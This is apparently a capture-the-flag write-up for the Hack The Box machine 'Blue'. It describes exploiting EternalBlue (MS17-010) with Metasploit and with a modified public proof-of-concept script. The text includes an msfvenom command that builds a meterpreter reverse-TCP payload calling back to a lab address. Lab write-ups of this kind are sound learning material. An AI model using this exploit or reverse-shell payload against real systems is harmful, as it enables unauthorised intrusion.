Blue
Blue
Blue
Blue
5th October 2017 / Document No D17.100.08
Prepared By: Alexander Reid (Arrexel)
Machine Author: ch4p
Difficulty: Easy
Classification: Official
Page 1 / 5
SYNOPSIS
Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the
EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining
attacks since it was leaked publicly.
Page 2 / 5
Enumeration
Nmap
Page 3 / 5
Exploitation
Metasploit
Page 4 / 5
Manual
Exploit: https://github.com/worawit/MS17-010
A shell can also be achieved using the above PoC. Modifying zzz_exploit.py is relatively easy.
Using \ as the username works in this case, as the server is using the default configuration.
A slight modification to the smb_pwn method is also required, as by default it only creates a text
file in the root of the drive. Adding the following lines will copy a local binary to the target and
execute it. The binary can be generated by Msfvenom using the command msfvenom -p
windows/meterpreter/reverse_tcp lhost=<LAB IP> lport=<PORT> -f exe > writeup.exe
It is now possible to run zzz_exploit.py. A named pipe is required to execute the script, and in
this case ntsvcs works just fine.
Page 5 / 5